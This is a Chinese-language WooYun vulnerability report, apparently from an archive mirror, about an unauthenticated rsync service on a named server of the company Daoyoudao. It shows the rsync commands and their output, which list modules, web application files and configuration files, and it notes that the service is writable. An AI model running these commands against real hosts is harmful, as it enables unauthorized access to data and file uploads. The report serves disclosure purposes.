乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-15: 细节已通知厂商并且等待厂商处理中 2015-04-20: 厂商已经主动忽略漏洞,细节向公众公开
道有道某服务器未授权访问可上传文件
211.144.132.51开了rsync服务,873端口
root@kali:~# rsync -v 211.144.132.51::Welcome to use the rsync services!terry terry 's directory from 10.172.0.201youday youday 's directory from 10.172.0.201pkgame-platform pkgame-platform 's directory from 10.172.0.201pkgame-union-images pkgame-union-imagespkgame-placard-induct pkgame-placard-inductpkgame-placard pkgame-placarddapp-pic dapp-picdapp-game dapp-gamedapp-app dapp-appdapp-theme dapp-themedapp-special dapp-specialdapp-upload dapp-uploaddapp-js dapp-jstest test rsyncpartner partnerpartner_backup_20131017 partner_backup_20131017tomcat-partner tomcat-partnerapk_package apk_packageapktool apktoolindustry_cert industry_certindustry_manage industry_manageindustry_qy industry_qyindustry_iwei industry_iweiindustry_wap industry_wapindustry_yx industry_yxindustry_dining industry_diningindustry_mb industry_mbindustry_sh2 industry_sh2tomcat-yx tomcat-yxtomcat-dining tomcat-diningtomcat-imanage tomcat-imanagetomcat-mb tomcat-mbtomcat-qy tomcat-qytomcat-iwei tomcat-iweitomcat-sh tomcat-shtomcat-wap tomcat-waptiger_test tomcat-wap_tigerios-res ios-resindustry_apk industry apkindustry_upload industry uploadqy-log qy-logadms-log adms-logtomcat-poster tomcat-posterindustry_poster industry_poster
多个管理系统,包含可写权限
Welcome to use the rsync services!receiving file list ... donedrwxr-xr-x 12288 2015/04/09 19:40:39 .-rw-r--r-- 372 2014/04/30 15:27:09 404.html-rw-r--r-- 27402 2014/04/30 15:27:12 404.png-rw-r--r-- 11841 2014/04/30 15:27:00 Copy of newOrder.jsp-rw-r--r-- 2820 2014/12/18 18:57:27 OtherOrderList.jsp-rw-r--r-- 189 2014/11/12 00:07:32 System.jsp-rw-r--r-- 187 2014/04/30 15:27:12 System1010.jsp-rw-r--r-- 10328 2014/12/24 20:04:06 accountConfirm.jsp-rw-r--r-- 8499 2014/09/18 19:05:25 accountConfirm1209.jsp-rw-r--r-- 8349 2014/12/09 18:10:36 accountConfirm1217.jsp-rw-r--r-- 10301 2014/12/24 10:43:31 accountConfirm122.jsp-rw-r--r-- 10275 2014/12/18 18:41:48 accountConfirm1224.jsp-rw-r--r-- 4911 2014/04/30 15:27:12 accountingStatement.jsp-rw-r--r-- 4071 2014/05/12 18:22:40 add.jsp-rw-r--r-- 11802 2014/05/12 18:22:40 addDocNot.jsp-rw-r--r-- 13011 2014/04/30 15:27:03 addDocument.jsp-rw-r--r-- 7278 2014/04/30 15:27:09 addIosAccount.jsp-rw-r--r-- 1730 2014/04/30 15:27:12 addLecturerAnnouncement.jsp-rw-r--r-- 5747 2014/04/30 15:27:19 addPartner.jsp-rw-r--r-- 6183 2014/04/30 15:27:09 addTenant.jsp-rw-r--r-- 4654 2014/04/30 15:27:09 addgood.jsp-rw-r--r-- 8653 2015/02/06 20:10:32 admin.jsp-rw-r--r-- 7763 2014/09/18 19:05:58 admin1217.jsp-rw-r--r-- 8593 2014/12/17 18:14:09 admin211.jsp-rw-r--r-- 3040 2014/09/25 22:08:48 adverDetailH.jsp-rw-r--r-- 3801 2014/04/30 15:27:12 advice.jsp-rw-r--r-- 3224 2014/04/30 15:27:09 adviceDetail.jsp-rw-r--r-- 2492 2014/04/30 15:27:18 adviceList.jsp-rw-r--r-- 11685 2014/12/24 18:41:16 appManagement.jsp-rw-r--r-- 1471 2014/03/25 18:04:30 appManagementList.jsp-rw-r--r-- 10272 2014/10/20 16:53:48 appcenter.jsp-rw-r--r-- 15251 2014/04/30 15:27:00 appendOrder.jsp-rw-r--r-- 1703 2014/04/30 15:27:04 areaStat.jsp-rw-r--r-- 5467 2014/04/30 15:27:12 auditCourseReservation.jsp-rw-r--r-- 10326 2014/04/30 15:27:09 basicInfo.jsp-rw-r--r-- 7631 2015/03/11 20:08:47 bdPartner.jsp-rw-r--r-- 4842 2015/03/11 20:08:39 bdorder.jsp-rw-r--r-- 956 2014/04/30 15:27:12 beep.jsp-rw-r--r-- 463 2014/04/30 15:27:04 bill.jsp-rw-r--r-- 13651 2015/01/14 18:17:51 billManage.jsp-rw-r--r-- 13661 2014/08/20 18:11:49 billManage114.jsp-rw-r--r-- 1521 2014/04/30 15:27:04 billSum.jsp-rw-r--r-- 3463 2014/04/30 15:27:12 canOrder.jsp-rw-r--r-- 3350 2014/04/30 15:27:19 cancellation.jsp-rw-r--r-- 9540 2015/02/03 15:00:43 chaBelong.jsp-rw-r--r-- 9495 2014/10/24 11:13:14 chaBelong0203.jsp-rw-r--r-- 8763 2014/08/14 11:02:54 chaBelong1024.jsp-rw-r--r-- 1701 2014/04/30 15:27:12 channelStat.jsp-rw-r--r-- 115002 2014/07/02 16:53:46 confirm.js-rw-r--r-- 4445 2014/04/30 15:27:09 courseReservation.jsp-rw-r--r-- 2911 2014/04/30 15:27:12 daoyoudao.html-rw-r--r-- 15104 2014/04/30 15:27:12 docProduct.jsp-rw-r--r-- 2216 2014/04/30 15:27:09 documentProduct.jsp-rw-r--r-- 242 2014/04/30 15:27:12 documentProductQ.jsp-rw-r--r-- 1266 2014/04/30 15:27:01 download.jsp-rw-r--r-- 7973 2014/09/18 19:11:45 engineer.jsp-rw-r--r-- 4068 2014/07/02 19:28:49 erpUser.jsp-rw-r--r-- 2681 2014/04/30 15:27:06 error.html-rw-r--r-- 1274 2014/04/30 15:27:18 extension.jsp-rw-r--r-- 48713 2014/11/11 23:54:02 fab.js-rw-r--r-- 24798 2014/11/20 15:35:33 fabBack.js-rw-r--r-- 5519 2014/11/27 17:24:06 fabBack.jsp-rw-r--r-- 4335 2014/11/12 20:11:32 fabBack1112.jsp-rw-r--r-- 4335 2014/11/12 20:57:53 fabBack1127.jsp-rw-r--r-- 96179 2015/03/11 20:09:56 fabBackDetail.jsp-rw-r--r-- 96459 2015/01/22 18:15:20 fabBackDetail0311.jsp-rw-r--r-- 95433 2014/11/14 09:44:19 fabBackDetail1119.jsp-rw-r--r-- 95447 2014/11/18 17:55:35 fabBackDetail122.jsp-rw-r--r-- 1279 2014/04/30 15:27:12 fabrication.jsp-rw-r--r-- 4473 2014/11/27 17:24:05 fabricationQuery.jsp-rw-r--r-- 2747 2014/04/30 15:27:03 fabricationQuery1127.jsp-rw-r--r-- 2721 2014/04/30 15:27:01 financial.jsp-rw-r--r-- 832 2014/04/30 15:27:09 findBalanceQ.jsp-rw-r--r-- 1624 2014/04/30 15:27:12 findDepositQ.jsp-rw-r--r-- 975 2014/04/30 15:27:01 findDocument.jsp-rw-r--r-- 2158 2014/04/30 15:27:12 findDocumentH.jsp-rw-r--r-- 1566 2014/04/30 15:27:06 findDownloadDocument.jsp-rw-r--r-- 2294 2014/04/30 15:27:09 findHNotice.jsp-rw-r--r-- 2585 2014/04/30 15:27:09 findOrderQ.jsp-rw-r--r-- 1628 2014/04/30 15:27:09 findOtherAcc.jsp-rw-r--r-- 1110 2014/04/30 15:27:04 findQNotice.jsp-rw-r--r-- 1194 2014/04/30 15:27:12 findSalesPromotionQ.jsp-rw-r--r-- 2596 2014/05/12 18:22:40 findall.jsp-rw-r--r-- 12359 2014/04/30 15:27:03 footer.jsp-rw-r--r-- 2265 2014/04/30 15:27:09 freePeriodMaintain.jsp-rw-r--r-- 2457 2014/04/30 15:27:09 getPartner.jsp-rw-r--r-- 823 2014/04/30 15:27:12 goodsList.jsp-rw-r--r-- 10433 2014/04/30 15:27:09 grant.jsp-rw-r--r-- 7576 2014/12/04 10:58:34 head.jsp-rw-r--r-- 7441 2014/04/30 15:27:09 head627.jsp-rw-r--r-- 3293 2014/04/30 15:27:09 head_BF.jsp-rw-r--r-- 1759 2014/04/30 15:27:09 home.jsp-rw-r--r-- 4227 2014/12/03 19:33:26 ilogin.html-rw-r--r-- 3365 2014/04/30 15:27:04 index.jsp-rw-r--r-- 10260 2014/04/30 15:27:04 industrialOrder.jsp-rw-r--r-- 936 2014/04/30 15:27:04 iosAccountQ.jsp-rw-r--r-- 6291 2014/04/30 15:27:12 iosApplication.jsp-rw-r--r-- 2250 2015/03/11 20:12:46 iosaccount.jsp-rw-r--r-- 2676 2014/04/30 15:27:03 keywordsDictionary.jsp-rw-r--r-- 2043 2014/04/30 15:27:03 lecturerAnnouncement.jsp-rw-r--r-- 3824 2014/04/30 15:27:09 lecturerResource.jsp-rw-r--r-- 4517 2014/04/30 15:27:12 login11.html-rw-r--r-- 4517 2014/04/30 15:27:12 login_backs.html-rw-r--r-- 654 2014/04/30 15:27:01 logout.jsp-rw-r--r-- 12321 2014/11/27 17:24:05 maildetail.jsp-rw-r--r-- 12130 2014/10/15 20:54:24 maildetail1127.jsp-rw-r--r-- 54919 2015/01/14 18:17:51 manageDetail.jsp-rw-r--r-- 54867 2014/07/02 19:28:52 manageDetail114.jsp-rw-r--r-- 1203 2014/04/30 15:27:01 monthBill.jsp-rw-r--r-- 4712 2014/04/30 15:27:12 newAdmin.jsp-rw-r--r-- 24336 2014/06/10 17:26:44 newOrder.jsp-rw-r--r-- 6695 2014/04/30 15:27:03 newTenant.jsp-rw-r--r-- 2208 2014/05/13 18:53:22 noticeXQ.jsp-rw-r--r-- 110146 2014/07/02 17:04:24 order.js-rw-r--r-- 12086 2014/04/30 15:27:12 order.jsp-rw-r--r-- 8756 2014/04/30 15:27:09 orderBasicInfo.jsp-rw-r--r-- 79593 2015/04/09 18:18:30 orderDetail.jsp-rw-r--r-- 79197 2015/01/29 16:38:29 orderDetail0311.jsp-rw-r--r-- 77429 2014/10/27 14:22:50 orderDetail1119.jsp-rw-r--r-- 77935 2014/11/20 12:09:59 orderDetail1127.jsp-rw-r--r-- 78254 2014/12/04 18:19:25 orderDetail113.jsp-rw-r--r-- 78266 2015/01/13 17:54:33 orderDetail122.jsp-rw-r--r-- 7927 2014/10/16 11:14:00 orderIliveList.jsp-rw-r--r-- 7723 2014/09/03 19:08:41 orderIliveList1014.jsp-rw-r--r-- 18923 2015/02/04 09:49:58 orderManage.jsp-rw-r--r-- 18513 2014/11/27 18:04:38 orderManage112.jsp-rw-r--r-- 18509 2014/06/26 20:30:48 orderManage1127.jsp-rw-r--r-- 423 2014/04/30 15:27:09 orderState.jsp-rw-r--r-- 1395 2014/04/30 15:27:01 outstanding.jsp-rw-r--r-- 2657 2014/04/30 15:27:09 parUserList.jsp-rw-r--r-- 819 2014/04/30 15:27:12 partnerSystemPackage.jsp-rw-r--r-- 1023 2014/04/30 15:27:09 partnersPerformance.jsp-rw-r--r-- 77 2014/04/30 15:27:09 popup.jsp-rw-r--r-- 1184 2014/04/30 15:27:12 portalSoftware.jsp-rw-r--r-- 1588 2014/04/30 15:27:06 productApplyAll.jsp-rw-r--r-- 2445 2014/04/30 15:27:00 productApplyAllH.jsp-rw-r--r-- 4366 2014/04/30 15:27:06 productapp.jsp-rw-r--r-- 20338 2014/04/30 15:27:04 productapply.jsp-rw-r--r-- 1907 2014/04/30 15:27:18 productpage.jsp-rw-r--r-- 21022 2014/04/30 15:27:09 productsale.jsp-rw-r--r-- 9430 2015/01/14 18:17:51 publishD.jsp-rw-r--r-- 9302 2014/04/30 15:27:04 publishD114.jsp-rw-r--r-- 3313 2014/04/30 15:27:09 reportMaintenance.jsp-rw-r--r-- 25 2014/07/02 12:04:20 robots.txt-rw-r--r-- 1498 2014/04/30 15:27:12 scalePartner.jsp-rw-r--r-- 499 2014/10/10 11:50:56 shutdown.jsp-rw-r--r-- 14186 2015/03/11 20:29:06 specialconf.jsp-rw-r--r-- 13969 2015/02/11 18:10:57 specialconf0311.jsp-rw-r--r-- 13952 2014/10/14 18:27:50 specialconf211.jsp-rw-r--r-- 9842 2014/07/10 19:08:48 specifyProducer.jsp-rw-r--r-- 980 2014/04/30 15:27:12 ssysAuth.jsp-rw-r--r-- 890 2014/04/30 15:27:12 sysAuth.jsp-rw-r--r-- 2724 2014/04/30 15:27:09 sysUser.jsp-rw-r--r-- 823 2014/04/30 15:27:04 updateNotice.jsp-rw-r--r-- 864 2014/04/30 15:27:09 weihu.html-rw-r--r-- 5017 2014/04/30 15:27:09 weihu.jsp-rw-r--r-- 2057 2014/11/11 19:53:10 welcome.jspdrwxr-xr-x 4096 2014/04/30 15:27:09 META-INFdrwxr-xr-x 4096 2015/04/09 19:40:20 WEB-INFdrwxr-xr-x 4096 2014/04/30 15:27:12 amchartsdrwxr-xr-x 4096 2014/04/30 15:27:12 attacheddrwxr-xr-x 4096 2014/10/17 18:39:32 cssdrwxr-xr-x 4096 2015/03/31 19:30:33 detaildrwxr-xr-x 4096 2015/01/14 18:29:04 financialdrwxr-xr-x 4096 2015/03/31 20:21:06 homedrwxr-xr-x 4096 2014/11/27 18:35:27 ilivedrwxr-xr-x 4096 2015/03/11 20:10:18 imagesdrwxr-xr-x 4096 2014/04/30 15:27:12 jquery-easyui-1.3.5drwxr-xr-x 4096 2014/04/30 15:27:12 jquery-uidrwxr-xr-x 4096 2015/03/31 19:28:48 jsdrwxr-xr-x 4096 2014/04/30 15:27:19 kindeditordrwxr-xr-x 4096 2014/04/30 15:27:06 lecturerdrwxr-xr-x 4096 2014/04/30 15:27:09 lg_imagesdrwxr-xr-x 4096 2014/04/30 15:27:12 lg_jsdrwxr-xr-x 4096 2014/04/30 15:27:12 lg_styledrwxr-xr-x 4096 2014/04/30 15:27:04 libdrwxr-xr-x 4096 2014/04/30 15:27:09 managedrwxr-xr-x 4096 2014/04/30 15:27:09 newStyledrwxr-xr-x 4096 2014/04/30 15:27:18 newsdrwxr-xr-x 4096 2015/03/04 10:36:29 orderdrwxr-xr-x 4096 2014/04/30 15:27:18 phonePartnerdrwxr-xr-x 4096 2014/11/27 18:49:43 productdrwxr-xr-x 4096 2014/09/11 20:30:14 styledrwxr-xr-x 4096 2014/04/30 15:27:09 tenantdrwxr-xr-x 4096 2014/04/30 15:27:09 uploadify-v3.1
root@kali:~# rsync -v 211.144.132.51::partner/WEB-INF/classes/Welcome to use the rsync services!receiving file list ... donedrwxr-xr-x 4096 2015/03/31 18:50:50 .-rw-r--r-- 7237 2015/01/05 21:33:51 applicationContext.xml-rw-r--r-- 6758 2015/04/09 19:11:20 applicationContext_timer.xml-rw-r--r-- 4317 2014/12/24 19:05:55 applicationContext_timer11.xml-rw-r--r-- 4179 2014/07/14 17:55:26 applicationContext_timer1124.xml-rw-r--r-- 4317 2015/01/05 17:58:19 applicationContext_timer211.xml-rw-r--r-- 5136 2015/02/11 19:52:21 applicationContext_timer331.xml-rw-r--r-- 3472 2014/05/12 18:22:40 applicationContext_timer626.xml-rw-r--r-- 770 2014/04/29 11:29:40 log4j.properties-rw-r--r-- 853 2015/04/09 18:22:13 properties.properties-rw-r--r-- 865 2015/03/30 17:59:50 properties0330.properties-rw-r--r-- 627 2014/08/13 14:48:07 properties1027.properties-rw-r--r-- 627 2014/08/13 14:48:07 properties1030.properties-rw-r--r-- 3736 2014/07/30 10:07:32 struts.xmldrwxr-xr-x 4096 2014/04/30 15:27:18 comsent 19 bytes received 444 bytes 308.67 bytes/sectotal size is 42894 speedup is 92.64
加密码
危害等级:无影响厂商忽略
忽略时间:2015-04-20 14:22
漏洞Rank:15 (WooYun评价)
暂无